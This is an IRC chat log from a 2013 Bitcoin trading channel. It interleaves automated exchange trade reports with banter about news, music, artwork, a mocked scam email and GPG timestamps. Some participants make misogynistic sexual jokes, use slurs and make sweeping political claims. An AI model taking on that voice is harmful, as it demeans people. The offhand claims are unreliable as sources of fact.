chsados how much did you get ? Oct 17 07:40:11 lemme check Oct 17 07:40:12 [HAVELOCK] [AM100] 20 @ 0.00548999 = 0.1098 BTC [+] Oct 17 07:40:36 52 satoshi per share Oct 17 07:40:38 Asset: LABCOIN Oct 17 07:40:38 Shares: 179 Oct 17 07:40:38 Paid: 0.00018934 BTC Oct 17 07:40:38 Transaction ID: D 2596 179 0.89395100 1380905340 Oct 17 07:40:43 or something Oct 17 07:40:55 http://i3.irishmirror.ie/incoming/article2170700.ece/ALTERNATES/s615/Eric-Eoin-Marques90238109-2170700.jpg Oct 17 07:41:02 is it just me or does this look distinctly medieval ? Oct 17 07:41:20 yes medieval, the masonry is very wonky Oct 17 07:41:43 mircea_popescu: Ah. mircea_popescu Give dude cop a skirt and it looks purely bronze age Oct 17 07:42:25 i souyld have used a semicolon there Oct 17 07:42:43 dang i love those Oct 17 07:43:15 a dude or a woman - you decide (its pat!) http://www.youtube.com/attribution_link?a=9F_EDi-Yi4la8Iz18RQiKw&u=%2Fwatch%3Fv%3Dha7smLPz2GY%26feature%3Dshare Oct 17 07:44:05 woman Oct 17 07:44:23 melanesian extraction Oct 17 07:44:52 she'll send you swimming bra Oct 17 07:45:43 thats fuckedhhap Oct 17 07:46:18 is it woody allen? Oct 17 07:50:27 http://imgur.com/WvwwiI0 Oct 17 07:50:28 imgur: the simple image sharer Oct 17 07:51:08 scotland yard will scotland yard Oct 17 07:51:20 http://www.youtube.com/watch?v=-KCBLA-fuVw Oct 17 07:51:21 Snoop Dogg & Wiz Khalifa "French Inhale" - YouTube Oct 17 07:51:24 [MPEX] [S.MPOE] 3400 @ 0.00082731 = 2.8129 BTC [+] {2} Oct 17 07:52:43 barry! Oct 17 07:56:25 hold it till you sold it Oct 17 07:56:29 [HAVELOCK] [CBTC] 10000 @ 0.00015 = 1.5 BTC [-] Oct 17 07:57:30 [HAVELOCK] [CBTC] 13005 @ 0.000139 = 1.8077 BTC [-] {3} Oct 17 08:01:22 ok time to sleep Oct 17 08:02:14 ciao bella Oct 17 08:10:27 https://www.youtube.com/watch?v=2CQLAhNlbfQ Oct 17 08:10:27 Happy Mondays - Step On - YouTube Oct 17 08:14:48 so do i get some mp fat sebs to watch my back when i setp off in bucharest or wot? Oct 17 08:15:48 [MPEX] [S.MPOE] 4000 @ 0.00082273 = 3.2909 BTC [-] Oct 17 08:17:17 romania aint no joke im told? Oct 17 08:21:16 mircea will you join me on that back sea marina making friends with drink? Oct 17 08:22:53 meh, i hate the east side. Oct 17 08:23:03 med? Oct 17 08:28:00 Vexual http://trilema.com/2011/se-poate-fuma-o-tigara/ there, that's for you. Oct 17 08:30:15 well if you feel comfortable at home, and seek adventure, you could always visit the barossa valley Oct 17 08:30:34 miniature beef and ecellent spakling white Oct 17 08:33:01 the vines are as old as our country and the waitresses are too far from home to drive Oct 17 08:36:08 [HAVELOCK] [B] [XBOND] 833 @ 0.00118999 = 0.9913 BTC [-] Oct 17 08:36:17 and a three piece suit is derigeur if you pay for the full degustation Oct 17 08:37:09 [HAVELOCK] [B] [XBOND] 950 @ 0.0011899 = 1.1304 BTC [-] Oct 17 08:37:30 those crazy arabs can keep all the virgins, ill take the sluts Oct 17 08:38:10 [HAVELOCK] [B] [XBOND] 193 @ 0.00118899 = 0.2295 BTC [-] Oct 17 08:38:41 and when you're returning from"the barossa" the breathaliser is always broken Oct 17 08:38:58 hey, this came out pretty good. Oct 17 08:39:03 write it down. Oct 17 08:39:11 I'll take the virgins and make them sluts **** BEGIN LOGGING AT Thu Oct 17 16:02:43 2013 Oct 17 16:03:27 http://www.cbc.ca/news/canada/newfoundland-labrador/trixie-a-fixture-in-downtown-st-john-s-passes-away-1.2100650 Oct 17 16:03:28 Iconic character in downtown St. John's passes away - Newfoundland & Labrador - CBC News Oct 17 16:04:28 [HAVELOCK] [AM100] 55 @ 0.00521509 = 0.2868 BTC [-] {3} Oct 17 16:04:39 paid Oct 17 16:05:23 they need to make the nicks longer for you man Oct 17 16:08:44 hahaha there's a remembrance page for trixie, it's priceless Oct 17 16:08:52 "she threw hot coffee on me once and called me a cunt" Oct 17 16:10:45 "she was on Duckworth Street politely asking people "Have ya got a quarter? Have ya got a quarter?" Then some guy walks by and it's "You tell your cocksuckin whore of a wife ta stop reading my goddamn mail, all RIGHT? It's an offence!", then without a beat she's back to the gentle "Have ya got a quarter?"" Oct 17 16:10:47 lel Oct 17 16:12:36 [HAVELOCK] [AM1] 5 @ 0.63559999 = 3.178 BTC [+] {3} Oct 17 16:14:22 ok, last one Oct 17 16:14:24 "the first time I ever heard her speak was one time when I was waiting for the bus on Water Street. She was standing in a shop doorway a few doors down and she looked right at me and yelled "I'll cut your cock off!"" Oct 17 16:14:34 http://www.youtube.com/watch?v=Di5NSU5yuKE Oct 17 16:14:34 Zhou Tonged - End of Silk Road - YouTube Oct 17 16:14:38 [HAVELOCK] [DEALCO] 100 @ 0.00699999 = 0.7 BTC [+] Oct 17 16:19:36 And we'll all get zhou Tonged together! Oct 17 16:22:00 This is coming From Salmon Andy, the immediate past credit manager of SNS Bank in Oct 17 16:22:00 the Netherlands. There is a serious proposal about a bonded Account in SNS Bank i Oct 17 16:22:00 would require you give Urgent Attention to. Oct 17 16:22:17 scammor today. capitalises attention, doesn't capitalise ist person pronoun. Oct 17 16:24:50 indeed scammers have weird capitalizations Oct 17 16:25:08 I don't know why Oct 17 16:27:04 Salmon Andy! Oct 17 16:27:14 one thing that'd be pretty cool, would be for someone in a physch dept somewhere with a good handle of awk Oct 17 16:27:25 to go through terrabytes of spam and mark the patters, make a study Oct 17 16:27:31 mircea_popescu: Will you at some point elaborate on the claim that states are mining? Oct 17 16:27:36 "Hamburger Bill here, send your funds to xyz" Oct 17 16:27:46 TomServo 50 years ? Oct 17 16:27:50 I've seen ways to guess gender from writing style Oct 17 16:27:51 Aww. Oct 17 16:27:51 [MPEX] [S.MPOE] 500 @ 0.00081555 = 0.4078 BTC [-] Oct 17 16:27:59 ok ok. i promise it be less than 50 years. Oct 17 16:28:06 that makes me better than most states. Oct 17 16:28:13 Hah Oct 17 16:28:27 You said you've seen evidence though? Oct 17 16:28:40 yeah, there's evidence alright. Oct 17 16:28:55 nubbins` you around ? Oct 17 16:29:03 yep Oct 17 16:29:10 kiss your wife dood. Oct 17 16:29:20 too late, she just headed out on her bike Oct 17 16:29:23 when she gets back? Oct 17 16:29:29 hehe. works for me. Oct 17 16:29:38 heraldry look OK? Oct 17 16:29:45 quite. Oct 17 16:29:58 great! i'm especially fond of the cow skull trim Oct 17 16:30:21 she wanted to add more cocks, but felt it would be a bit trite Oct 17 16:30:44 ppl are struggling to get the autoupdater to work, it's currently a complete mess, gdm scrolling everywhere and so on Oct 17 16:30:54 [HAVELOCK] [B] [XBOND] 916 @ 0.00119995 = 1.0992 BTC [+] {2} Oct 17 16:30:56 pretty gloomy atmosphere and i'm suddenly shrieking with glee Oct 17 16:31:16 everyone's "o wow that looks cool. second pause. oh shit you're going to want that implemented now won't you." Oct 17 16:31:22 heh! Oct 17 16:31:55 [HAVELOCK] [B] [XBOND] 8091 @ 0.00121102 = 9.7984 BTC [+] {14} Oct 17 16:31:58 you can also use the original boar that we submitted, of course, so that's a total of 7 supports Oct 17 16:32:23 if i was going to make a bitch, is that all 6 shields are in the same exact shape Oct 17 16:32:39 but that can wait a year. Oct 17 16:32:56 [HAVELOCK] [B] [XBOND] 1300 @ 0.00122624 = 1.5941 BTC [+] {3} Oct 17 16:33:12 yeah, she had a bit of tendonitis from work that slowed her down a lot at the end. would have liked to do a variety of shapes Oct 17 16:34:01 and a porny one or two might work, given that people get to choose for themselves. Oct 17 16:34:05 we see. Oct 17 16:34:49 well, we *have* produced some fairly obscene artwork in the past, so ya know. everything's possible Oct 17 16:35:03 link ? Oct 17 16:35:19 one sec Oct 17 16:35:56 http://dicksurgery.files.wordpress.com/2012/12/dick-surgery.png?w=490 Oct 17 16:36:00 http://thescope.ca/wp-content/uploads/2011/11/monsterbator-540.jpg Oct 17 16:36:02 etc Oct 17 16:36:38 ha, those cocks look sketchy. Oct 17 16:37:00 [HAVELOCK] [B] [XBOND] 1897 @ 0.00122628 = 2.3263 BTC [+] Oct 17 16:37:18 http://pinkeyeprints.files.wordpress.com/2012/04/amvi6-imgur.jpg Oct 17 16:37:24 anyway. cool deal. Oct 17 16:37:27 that one's a bit hard to read Oct 17 16:37:47 yeah! i'm back and forth all day, we can deal with business whenever you've got the time Oct 17 17:10:33 [HAVELOCK] [AM100] 33 @ 0.00574999 = 0.1897 BTC [+] Oct 17 17:13:36 [HAVELOCK] [AM100] 35 @ 0.00575 = 0.2013 BTC [+] Oct 17 17:18:37 anyone got friedcats email? Oct 17 17:18:43 for share transfers Oct 17 17:24:51 [HAVELOCK] [AM100] 100 @ 0.00578985 = 0.579 BTC [+] {3} Oct 17 17:25:48 [HAVELOCK] [AM100] 80 @ 0.00578993 = 0.4632 BTC [+] {2} Oct 17 17:26:49 [HAVELOCK] [AM100] 60 @ 0.00579 = 0.3474 BTC [+] Oct 17 17:28:51 [MPEX] [S.MPOE] 1600 @ 0.00081637 = 1.3062 BTC [+] Oct 17 17:44:07 [HAVELOCK] [AM1] 1 @ 0.635 BTC [-] Oct 17 17:46:09 [MPEX] [S.MPOE] 3845 @ 0.0008106 = 3.1168 BTC [-] Oct 17 17:52:15 [HAVELOCK] [AM100] 1056 @ 0.00498718 = 5.2665 BTC [-] {29} Oct 17 17:54:17 [HAVELOCK] [VTX] 15 @ 0.3611014 = 5.4165 BTC [+] Oct 17 17:57:20 [MPEX] [S.MPOE] 1700 @ 0.0008106 = 1.378 BTC [-] Oct 17 18:05:27 [HAVELOCK] [AM1] 1 @ 0.6 BTC [-] Oct 17 18:20:17 http://queue.acm.org/detail.cfm?ref=rss&id=2536492 Oct 17 18:20:18 Barbarians at the Gateways - ACM Queue Oct 17 18:25:48 [HAVELOCK] [AM1] 1 @ 0.59000001 BTC [-] Oct 17 18:26:49 [HAVELOCK] [AM100] 105 @ 0.00519999 = 0.546 BTC [+] {2} Oct 17 18:27:50 [MPEX] [S.MPOE] 1300 @ 0.00081403 = 1.0582 BTC [+] Oct 17 18:28:59 http://www.theregister.co.uk/2013/10/17/free_cocaine_giveaway_from_russian_search_engine_yandex/ Oct 17 18:36:56 do they accept bitcoins like Baidu? that would be full circle Oct 17 18:37:31 nubbins` http://trilema.com/2013/eulora-october-update/ there's your ssw. #3! Oct 17 18:38:11 dangit i lost my cookie again Oct 17 18:39:43 yandes is giving free cooke Oct 17 18:42:04 [MPEX] [S.MPOE] 1950 @ 0.0008106 = 1.5807 BTC [-] Oct 17 18:42:08 mircea_popescu: great! Oct 17 18:46:00 free coke? Oct 17 18:49:11 [HAVELOCK] [AM100] 28 @ 0.00519959 = 0.1456 BTC [-] Oct 17 18:54:16 [HAVELOCK] [AM100] 25 @ 0.00519959 = 0.13 BTC [-] Oct 17 18:56:18 [MPEX] [S.MPOE] 5300 @ 0.00081438 = 4.3162 BTC [+] {2} Oct 17 19:12:35 [HAVELOCK] [AM100] 20 @ 0.00519959 = 0.104 BTC [-] Oct 17 19:14:38 http://www.youtube.com/watch?v=EnOPoAF136A Oct 17 19:14:38 Opening a Combo lock with a Shim - YouTube Oct 17 19:15:38 [MPEX] [S.MPOE] 1450 @ 0.00081473 = 1.1814 BTC [+] Oct 17 19:21:40 mircea_popescu: i vaguely recall this method being described in 'Phrack' in the '90s. Oct 17 19:22:59 "all you people are good for is smoking crack and shimmying locks!" Oct 17 19:23:46 [MPEX] [S.MPOE] 4600 @ 0.00082195 = 3.781 BTC [+] {3} Oct 17 19:28:00 that shim trick is great, wish I'd known it back in school. Oct 17 19:28:38 gotta go out with more shimmies when you're in school if you want to know shimmy tricks Oct 17 19:29:37 micrea popescu: I was looking through the logs on what you were saying about gpg encryption with regard to time/date can you recall that Oct 17 19:30:03 that it's not reliable ? Oct 17 19:30:40 right Oct 17 19:30:49 cant search the logs by text was wondering what day that was Oct 17 19:30:52 i said that in a trilema comment most recently. Oct 17 19:30:58 lemme see. Oct 17 19:32:13 lel, shimmies Oct 17 19:32:14 http://www.youtube.com/watch?v=gH2dF_0rNyQ Oct 17 19:32:15 Ol' Dirty Bastard Yo MTV Drunken Freestyle - YouTube Oct 17 19:32:40 KRS-1 ". The timing implicit in gpg signatures is documentedly unreliable - to the degree the mainainer insists it shouldn’t be used." http://trilema.com/2013/snsa-first-product-the-cardano/#comment-95494 Oct 17 19:32:41 10th. Oct 17 19:32:54 [HAVELOCK] [AM100] 132 @ 0.00519995 = 0.6864 BTC [+] {4} Oct 17 19:33:11 awesome..thanks. Oct 17 19:33:30 I needed to read this again and i'm passing it on to a colleague. Oct 17 19:37:17 you can trivially verify it yourself, set your system clock to your birthday and see what happens. Oct 17 19:37:59 [HAVELOCK] [DEALCO] 100 @ 0.00699 = 0.699 BTC [-] Oct 17 19:41:10 HOORAY I WON Oct 17 19:41:19 it's my birthday! Oct 17 19:41:42 ty o kind wise computer clock Oct 17 19:42:00 lol Oct 17 19:54:15 [HAVELOCK] [B] [XBOND] 889 @ 0.00118925 = 1.0572 BTC [-] {7} Oct 17 20:17:39 [HAVELOCK] [AM100] 109 @ 0.00530329 = 0.5781 BTC [+] {3} Oct 17 20:18:40 [HAVELOCK] [AM100] 109 @ 0.00539 = 0.5875 BTC [+] Oct 17 20:19:41 [HAVELOCK] [AM100] 20 @ 0.00539 = 0.1078 BTC [+] Oct 17 20:23:45 [MPEX] [S.MPOE] 1319 @ 0.00082133 = 1.0833 BTC [-] Oct 17 20:24:46 [MPEX] [S.MPOE] 981 @ 0.0008227 = 0.8071 BTC [+] Oct 17 20:42:03 [HAVELOCK] [CFIG] 2 @ 0.12865 = 0.2573 BTC [-] {2} Oct 17 21:31:33 http://www.aljazeera.com/news/americas/2013/10/us-government-partial-shutdown-ends-201310162387774904.html#comment-1085737119 Oct 17 21:31:33 US Congress votes to end government shutdown - Americas - Al Jazeera English Oct 17 21:31:39 emergent bitcoinism among the innocent. Oct 17 21:32:33 silliness Oct 17 21:32:52 a couple times a year we are saved from the brink of total disaster! Oct 17 21:33:06 hey that song Tom Ford is okay I guess..I take back almost everything I said about Jay Z. Almost. Oct 17 21:33:12 lol Oct 17 21:33:19 there are better songs of his than that Oct 17 21:33:28 heard a remix of it the other night that was even better than his Oct 17 21:33:52 heh, that's my main issue with the song, the beat is so-so Oct 17 21:34:01 ya my fav is HIZZO and Girls and the one he did with UGK Big Pimpin (old one) Oct 17 21:34:20 thats bout it,..oh and he killed it with 99 Problemz Oct 17 21:34:55 [MPEX] [S.MPOE] 1498 @ 0.0008227 = 1.2324 BTC [+] Oct 17 21:54:03 i wonder if there will be a market one day for "clean" coins Oct 17 21:54:12 and thats what makes mining the shizz Oct 17 21:54:55 there already was such a market, back when pirate was the rage. Oct 17 21:55:16 it's been kept alive since by various doods wishing to pose as miners Oct 17 21:55:48 so in 5 years clean coins will demand a premium price Oct 17 21:56:00 or they do already? Oct 17 22:02:23 [HAVELOCK] [VTX] 2 @ 0.36000003 = 0.72 BTC [-] Oct 17 22:03:51 ThickAsThieves: wait till somebody picks up 'shitcoin.' Oct 17 22:07:36 ooh Oct 17 22:07:54 shitfunder, shitpay, etc Oct 17 22:08:30 nubbins`: shitcoin was a crackpot proposal of mine (http://www.loper-os.org/?p=988). Oct 17 22:09:19 ;;google kurniawan Oct 17 22:09:20 Rudy Kurniawan - Wikipedia, the free encyclopedia: ; Why Rudy Kurniawan Was Arrested for Wine Fraud -- New York ...: ; Will Rudy Kurniawan Find a New Lawyer? - Wine Spectator: Oct 17 22:09:21 heh! Oct 17 22:09:33 i wonder how long for the first fakewine ipo. Oct 17 22:09:33 wine is the new coffee Oct 17 22:12:27 ;;rate mircea_popescu +2 patron of the arts Oct 17 22:12:28 Rating entry successful. Your rating of 2 for user mircea_popescu has been recorded. Oct 17 22:12:40 ^ you can put that on your CV, you know Oct 17 22:12:59 haha cool. Oct 17 22:14:52 0+2 must be...2 Oct 17 22:15:02 didnt you have like a -99 rating lol Oct 17 22:16:10 "I've never traded with him, but he has behaved immaturely, and abused WOT ratings by -10 rating me for simply enforcing the #bitcoin-otc rules" Oct 17 22:16:11 lel Oct 17 22:18:05 aww teh butthurt. Oct 17 22:18:24 KRS-1 who ? Oct 17 22:18:26 enforcing gets no respect these days Oct 17 22:18:39 [HAVELOCK] [CBTC] 1111 @ 0.000169 = 0.1878 BTC [-] Oct 17 22:20:16 i assumed he was talking to you Oct 17 22:20:27 asciilifeform: these shitcoins sound great Oct 17 22:20:54 i bitchslap people occasionally, but other than that dunno. Oct 17 22:32:52 [HAVELOCK] [VTX] 5 @ 0.36000003 = 1.8 BTC [-] Oct 17 22:35:25 should be interesting to see how virtex debit cards work out Oct 17 22:46:05 [MPEX] [S.MPOE] 3600 @ 0.00082077 = 2.9548 BTC [-] Oct 17 22:55:25 http://www.zerohedge.com/contributed/2013-10-17/nsa-revelations-kill-ibm-hardware-sales-china Oct 17 22:55:28 NSA Revelations Kill IBM Hardware Sales in China | Zero Hedge Oct 17 22:56:02 http://www.reddit.com/r/Bitcoin/comments/1onrbd/china_banking_regulatory_commission_no_plans_to/ Oct 17 23:00:13 asciilifeform the linux part in there is lulzy. lamers just don't get that by their showing up at a cool party they don't become cool Oct 17 23:00:17 the party just becomes lame. Oct 17 23:00:53 these particular lamers have been at the party for a rather long time. Oct 17 23:01:21 [MPEX] [S.MPOE] 3650 @ 0.00082449 = 3.0094 BTC [+] {2} Oct 17 23:01:25 standing in the corner, mumbling something, etc Oct 17 23:01:54 this is true. kinda why the party is at best so-so for a while now. Oct 17 23:02:22 http://www.ubuntu.com/partners/ibm etc Oct 17 23:02:23 IBM and Ubuntu | Ubuntu Oct 17 23:10:30 [HAVELOCK] [VTX] 8 @ 0.36000003 = 2.88 BTC [-] Oct 17 23:15:35 [HAVELOCK] [B] [XBOND] 900 @ 0.001188 = 1.0692 BTC [-] {3} Oct 17 23:16:36 [HAVELOCK] [AM100] 34 @ 0.0054 = 0.1836 BTC [+] Oct 17 23:24:52 heh Oct 17 23:25:00 chinese wont buy american hardware Oct 17 23:25:05 americans wont buy chinese Oct 17 23:29:10 of course pointing out that china's on the downward leg of a pump n dump anyway would detract from the sensationalism Oct 17 23:36:46 dub it was on the same downward leg last quarter, too. Oct 17 23:41:01 [HAVELOCK] [B] [XBOND] 464 @ 0.00121998 = 0.5661 BTC [+] {2} Oct 17 23:41:23 its good too see IBM having negative growth pretty much since I jumped ship though, happy to take credit Oct 17 23:42:21 clearly took a hit on the baller index Oct 17 23:45:05 [HAVELOCK] [B] [XBOND] 414 @ 0.00117572 = 0.4867 BTC [-] {4} Oct 17 23:46:47 lol Oct 17 23:47:03 +1 for Romania..awesome I want one: http://autos.yahoo.com/blogs/motoramic/romania-answer-hummer-prepares-end-world-204815032.html Oct 17 23:52:02 cool Oct 18 00:04:23 [HAVELOCK] [AM1] 1 @ 0.62899999 BTC [+] Oct 18 00:05:24 [HAVELOCK] [AM100] 26 @ 0.00569499 = 0.1481 BTC [+] Oct 18 00:18:37 [MPEX] [S.MPOE] 1790 @ 0.00082077 = 1.4692 BTC [-] Oct 18 00:41:00 [MPEX] [S.MPOE] 5000 @ 0.00082014 = 4.1007 BTC [-] Oct 18 00:54:13 [HAVELOCK] [AM1] 15 @ 0.59066668 = 8.86 BTC [-] {5} Oct 18 00:58:17 [HAVELOCK] [AM100] 38 @ 0.00497221 = 0.1889 BTC [-] {5} Oct 18 01:03:22 [MPEX] [S.NSA] 70000 @ 0.0001 = 7 BTC Oct 18 01:05:10 will S.NSA make a spy ring? Oct 18 01:05:20 decoder ring Oct 18 01:06:15 maybe as a cockring Oct 18 01:13:31 [MPEX] [S.MPOE] 4500 @ 0.00081858 = 3.6836 BTC [-] {3} Oct 18 01:45:03 [HAVELOCK] [AM100] 21 @ 0.00500001 = 0.105 BTC [-] Oct 18 01:55:13 [MPEX] [S.NSA] 5000 @ 0.0001 = 0.5 BTC Oct 18 01:58:17 [HAVELOCK] [B] [XBOND] 170 @ 0.001219 = 0.2072 BTC [-] Oct 18 02:04:22 [MPEX] [S.MPOE] 600 @ 0.00081719 = 0.4903 BTC [-] Oct 18 02:15:34 [MPEX] [S.MPOE] 600 @ 0.00082033 = 0.4922 BTC [+] Oct 18 02:31:50 [HAVELOCK] [VTX] 8 @ 0.36000003 = 2.88 BTC [-] Oct 18 02:41:59 [HAVELOCK] [CBTC] 3141 @ 0.00017999 = 0.5653 BTC [+] {2} Oct 18 02:44:34 bitcoinflush what an astonishingly appropriate name.. Oct 18 03:14:32 [HAVELOCK] [B] [XBOND] 102 @ 0.0011712 = 0.1195 BTC [-] Oct 18 03:41:52 Duffer1: I imagine there have been few more appropriate names in bitcoindom aside from maybe rapeghost, but even then... Oct 18 03:43:49 dear mircea can you please give me a bit of background on what you mean by future automatic lifting of the US debt ceiling? Oct 18 03:46:30 benkay: I think he probably means automatic in that Obummer has broken the spirit and power of the Congress, but it would probably be better to hear from his mouth. Oct 18 03:50:51 I personally feel the US is simply a failed state. America is basically Somalia only there is but one armed gang running the show at the moment. Oct 18 03:51:34 killer feels bro Oct 18 03:52:04 I await the emperor's abandonment of black suits for some Kenneth Cole swag dyed in tyrian purple. Oct 18 03:52:09 [MPEX] [S.MPOE] 3148 @ 0.00081559 = 2.5675 BTC [-] {3} Oct 18 03:55:19 somalia gdp: $6 billion US gdp: $16,000 billion Oct 18 03:55:43 "basically" the same Oct 18 03:55:56 somalia military spend : $0 US: $16,000 Oct 18 03:56:01 hehe Oct 18 03:56:03 b Oct 18 03:56:23 no, $8b on military, $8b on debt service Oct 18 03:56:41 er, 8,000. whatever. Oct 18 03:56:46 horse is DEAD. Oct 18 03:57:03 liked one Completly Believable Infographic I saw about the shutdown Oct 18 03:57:26 somethign like cost of shutdown $24b, cost of free tertiary education $12b Oct 18 03:57:55 of course, like doctering amercians would probably rather die than be educated for free Oct 18 03:58:12 ? we are educated for free. Oct 18 03:58:15 [HAVELOCK] [AM1] 3 @ 0.62799999 = 1.884 BTC [+] Oct 18 03:58:23 except college. which costs everything you have plus 10. Oct 18 03:58:33 tertiary means college Oct 18 03:58:36 oh Oct 18 04:00:24 Well, to be fair I seem to have received what seems a novel variant on the classic Nigerian Price scam. We'll see if they respond with photos: http://bitbin.it/fLFxpTl6 **** BEGIN LOGGING AT Fri Oct 18 11:18:02 2013 Oct 18 11:27:33 [MPEX] [S.MPOE] 6450 @ 0.00081694 = 5.2693 BTC [+] {2} Oct 18 11:43:21 dub oh gtfo. "sanity is a religion" bs, basically the internet has devolved to a sort of cracked-clone Oct 18 11:44:41 "i'm an underpaid 'creative' with no ideas required to churn out oodles of 'work', here's my recipe : take random things to make random claims about. can be used to create an infinity of articles that are mildly entertaining for the midly stupid relatively illiterate net dorks." Oct 18 11:48:08 ;;later tell bingoboingo lmao @ your art collection. Oct 18 11:48:08 The operation succeeded. Oct 18 11:50:44 ;;later tell benkay computing hashes is a much better "use" of natural gas than mouthbreathers are a "use" of oxygen. luckily nature is more akin a whore than a bar of soap : it doesn't wear out. Oct 18 11:50:45 The operation succeeded. Oct 18 11:52:01 pankkake yurpean govts have better shit to do than keep up with technology. Oct 18 11:54:59 [HAVELOCK] [NEOBEE] 119 @ 0.00249999 = 0.2975 BTC [-] Oct 18 11:56:00 [HAVELOCK] [NEOBEE] 201 @ 0.00249999 = 0.5025 BTC [-] {2} Oct 18 11:56:21 http://www.theregister.co.uk/2013/10/17/bitcoin_exchange_ddos_flood/ Oct 18 11:57:01 [HAVELOCK] [NEOBEE] 126 @ 0.00249999 = 0.315 BTC [-] Oct 18 11:58:02 [HAVELOCK] [NEOBEE] 120 @ 0.0025 = 0.3 BTC [+] Oct 18 11:58:31 lol @all teh crapola dns masquerading firms trying to sell their product. Oct 18 11:58:41 if incapsula/cloudflare/etc were any good mpex'd use them. Oct 18 12:02:36 http://www.forbes.com/sites/kashmirhill/2013/10/17/does-this-17-million-bitcoin-wallet-belong-to-alleged-silk-road-mastermind-ross-ulbricht/ Oct 18 12:02:37 Does This $17 Million Bitcoin Wallet Belong To Alleged Silk Road Creator Ross Ulbricht? - Forbes Oct 18 12:04:08 [MPEX] [S.MPOE] 9640 @ 0.0008136 = 7.8431 BTC [-] Oct 18 12:20:25 [MPEX] [S.MPOE] 6353 @ 0.00081932 = 5.2051 BTC [+] {2} Oct 18 13:08:52 dub here, because i like you so : http://trilema.com/2013/the-disadvantage-of-teaching-people-the-alphabet-and-nothing-more-is-that-you-have-to-somehow-put-up-with-a-bunch-of-retards-that-can-now-express-themselves-in-writing/ Oct 18 13:12:16 [HAVELOCK] [B] [XBOND] 95 @ 0.00119 = 0.1131 BTC [-] Oct 18 13:18:36 http://www.youtube.com/watch?v=5Krz-dyD-UQ Oct 18 13:21:04 lol Oct 18 13:25:52 http://letstalkbitcoin.com/the-regulation-of-bitcoin/#.UmEMifmsigI Oct 18 13:25:53 The Regulation of Bitcoin | Lets Talk Bitcoin Oct 18 13:26:00 by Amir Taaki Oct 18 13:26:20 “Respect for authority figures is a sign of maturity.” Oct 18 13:26:21 “Men with good jobs dress smart and respectably.” Oct 18 13:26:21 “Work hard for a good job and a good life. Retire young.” Oct 18 13:26:21 “Don’t talk to strangers.” Oct 18 13:26:21 “Life is about money. Money makes the world go round.” Oct 18 13:26:21 I was told all of these sentences in my life. That learning to accept authority is an inevitable part of growing up. That my character is defined by how I look, not how I act. That my single purpose is to be a work-slave. To avoid interaction with random unknowns outside my circle. And that responsibility starts and stops with myself. Oct 18 13:26:21 All of them are bad values. Oct 18 13:27:33 yeah uh totally i mean like bad and hang on Oct 18 13:27:34 i got a call. Oct 18 13:35:39 [MPEX] [S.MG] 2666 @ 0.00018 = 0.4799 BTC [-] Oct 18 13:45:49 [MPEX] [S.MPOE] 3935 @ 0.00081764 = 3.2174 BTC [-] Oct 18 14:03:06 [MPEX] [S.MPOE] 2749 @ 0.00081473 = 2.2397 BTC [-] {2} Oct 18 14:05:08 [HAVELOCK] [NEOBEE] 400 @ 0.0025 = 1 BTC [+] Oct 18 14:12:15 [MPEX] [S.MG] 20000 @ 0.000165 = 3.3 BTC [-] Oct 18 14:14:17 [HAVELOCK] [SMG] 10000 @ 0.00015094 = 1.5094 BTC [-] {5} Oct 18 14:16:19 [MPEX] [S.MPOE] 1250 @ 0.00081353 = 1.0169 BTC [-] Oct 18 14:33:37 [HAVELOCK] [AM100] 30 @ 0.00515 = 0.1545 BTC [-] {2} Oct 18 14:41:00 it would be cool to have by-address stats on bitbet, for example to be able to see how much was won compared to how much was wagered Oct 18 14:42:46 [MPEX] [S.MPOE] 3397 @ 0.00081472 = 2.7676 BTC [+] {2} Oct 18 14:55:58 [HAVELOCK] [NEOBEE] 101 @ 0.0025 = 0.2525 BTC [+] Oct 18 15:00:02 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 18 15:11:13 [MPEX] [S.MPOE] 6200 @ 0.00082025 = 5.0856 BTC [+] Oct 18 15:24:26 [HAVELOCK] [DEALCO] 100 @ 0.0069999 = 0.7 BTC [+] Oct 18 15:25:44 pankkake Oct 18 15:25:49 about 766.com exchange Oct 18 15:25:51 What is the price to own 1% of the exchange? I am too hungover to calculate myself. Oct 18 15:25:51 If the price for the whole exchange is 500-2000 BTC I would buy. If higher, too big risk and too easy to fail. Oct 18 15:25:52 Look at Digitalcoins CryptoAve share auction, I bought 1% for 5BTC and the exchange is then valued 500BTC, a much undervalued price. Oct 18 15:26:00 http://www.reddit.com/r/BitcoinStocks/comments/1ooemf/has_anyone_invested_in_796com/ Oct 18 15:26:00 123! Oct 18 15:42:19 just-dice.com down? Oct 18 15:46:49 [MPEX] [S.MPOE] 4550 @ 0.00082025 = 3.7321 BTC [+] Oct 18 16:02:04 [MPEX] [S.MPOE] 1231 @ 0.00081779 = 1.0067 BTC [-] Oct 18 16:14:00 !jd Oct 18 16:14:01 Just-Dice stat: 4947 BTC profit, 61.7k BTC invested, 186.74 mio bets, 4.19 mio BTC wagered Oct 18 16:16:17 [MPEX] [S.MPOE] 3820 @ 0.00082025 = 3.1334 BTC [+] Oct 18 16:20:21 [HAVELOCK] [VTX] 2 @ 0.367 = 0.734 BTC [+] Oct 18 16:32:34 [MPEX] [S.MPOE] 972 @ 0.00081779 = 0.7949 BTC [-] Oct 18 16:33:35 [MPEX] [S.MPOE] 6328 @ 0.00081404 = 5.1512 BTC [-] {3} Oct 18 17:00:01 [MPEX] [S.MPOE] 5950 @ 0.00082025 = 4.8805 BTC [+] Oct 18 17:00:01 [HAVELOCK] [HIM] 2 @ 0.069 = 0.138 BTC [+] Oct 18 17:00:02 [HAVELOCK] [LABCO] [PAID] 0.04958868 BTC to 40`316 shares, 123 satoshi per share Oct 18 17:05:06 [HAVELOCK] [CFIG] 1 @ 0.144 BTC [+] Oct 18 17:16:17 [HAVELOCK] [AM100] 49 @ 0.00517 = 0.2533 BTC [-] Oct 18 17:21:21 [HAVELOCK] [AM1] 1 @ 0.59 BTC [+] Oct 18 17:38:51 https://just-dice.com/roll/184417807 this is an interesting bet on JD Oct 18 17:38:54 is that 1% house edge? Oct 18 17:51:52 [MPEX] [S.MPOE] 1200 @ 0.00081947 = 0.9834 BTC [-] Oct 18 18:04:40 wow i'd throw $10K on that too Oct 18 18:10:11 [HAVELOCK] [AM100] 48 @ 0.00516509 = 0.2479 BTC [-] Oct 18 18:12:12 [HAVELOCK] [AM100] 31 @ 0.00516002 = 0.16 BTC [-] Oct 18 18:15:15 [HAVELOCK] [AM1] 2 @ 0.57149 = 1.143 BTC [-] {2} Oct 18 18:16:16 [HAVELOCK] [AM100] 20 @ 0.00515375 = 0.1031 